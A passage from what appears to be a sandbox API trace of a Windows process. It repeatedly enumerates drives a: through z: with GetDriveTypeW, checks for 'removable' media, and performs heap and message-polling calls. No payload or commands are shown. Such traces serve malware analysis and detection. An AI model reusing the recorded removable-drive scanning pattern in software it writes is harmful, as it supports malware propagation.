(lpRootPathName="j:\\") returned 0x1 [0213.840] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.840] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.840] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.840] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.840] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.841] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.841] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.841] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.841] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.841] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.842] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.842] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.842] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.843] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.843] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.843] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.843] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.843] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.843] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.844] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.844] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.844] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.844] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.844] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.844] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.844] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.844] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.844] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.845] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.845] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.845] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.845] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.845] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.846] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.846] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.846] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.846] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.847] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.847] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.847] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.847] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.847] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.847] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.848] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.848] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.848] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.848] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.848] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.849] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.849] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0213.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.850] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fc0 [0213.850] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fc0 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0213.851] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0213.851] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.851] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.851] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0213.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.852] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.852] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0213.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.852] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.852] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.852] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.853] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.853] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.853] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.853] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.853] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.853] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.854] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.854] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.854] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.854] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.854] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.854] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.854] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.855] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.855] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.855] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.855] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.855] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.855] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.855] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.856] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.856] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.856] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.856] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.856] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0213.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.856] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.856] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0213.857] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0213.857] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.857] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.857] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.857] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.858] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0213.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.858] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.858] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.858] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.859] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.859] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.859] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.859] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.859] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.859] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.859] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.860] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.860] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.860] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.860] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.860] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.860] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.861] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.861] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.861] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.861] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.861] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.862] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.862] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.862] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.862] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.862] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.862] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.863] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0213.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0213.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0213.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.864] PeekMessageW (in: lpMsg=0x7dfde4, 